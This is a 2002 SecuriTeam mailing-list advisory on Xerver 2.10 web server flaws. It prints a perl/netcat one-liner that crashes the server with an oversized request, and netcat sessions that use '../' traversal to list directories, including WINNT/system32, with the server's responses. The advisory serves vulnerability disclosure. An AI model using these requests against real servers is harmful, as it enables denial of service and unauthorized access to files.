[NEWS] Xerver 2.10 Directory Traversal and DoS

From: support@securiteam.com
Date: 03/09/02

From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Mar 2002 00:30:00 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Xerver 2.10 Directory Traversal and DoS


 <http://www.javascript.nu/xerver/> Xerver Free Web Server is a tiny web
server allowing you to run CGI/perl scripts on your computer. Xerver is a
tiny, fast and free web server, but is still advanced and supports both
HTTP/1.1 and HTTP/1.0 and all HTTP methods (GET, POST and HEAD).

Xerver v2.1 suffers from a directory traversal vulnerability that allows
to view directory listings, and to a DoS bug that enables to crash the web
server remotely.


Vulnerable systems:
Xerver v2.10 for Windows, Linux, BSD, Solaris, and MAC

Port 32123 is usually used for server configuration. It is possible to
crash the server remotely by requesting the URL "C:\" several times.

$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn

Another bug enables any remote user to view directory listings using
standard web requests.

Example 1:
$ nc -vvn 80
(UNKNOWN) [] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0
HTTP/1.1 200 OK
Date: March 6, 2002 8:52:51 PM CST
Server: Xerver_v2
Connection: close
Location: /
Content-Type: text/html

<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for
ONT><PRE> <B>File name File size&nb
sp; Last modified</B>

Program Files
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG
er" BORDER=0> Program Files</A>

<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" B

<A HREF="WINNT" STYLE="text-decoration: none;"><IMG
SRC="/Image:showFolder" BORD


Accessing the following URL:

Results in:

Directory Listing for /

    File name File size Last modified

 Documents and Settings
 My Downloads
 Program Files


Example 2:

$ nc -vvn 80
(UNKNOWN) [] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is:

Directory Listing for /WINNT/system32/

File name File size Last modified


Vendor Response:
The vendor was notified.


The information has been provided by <mailto:al3xhernandez@ureach.com>
Alex Hernandez.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.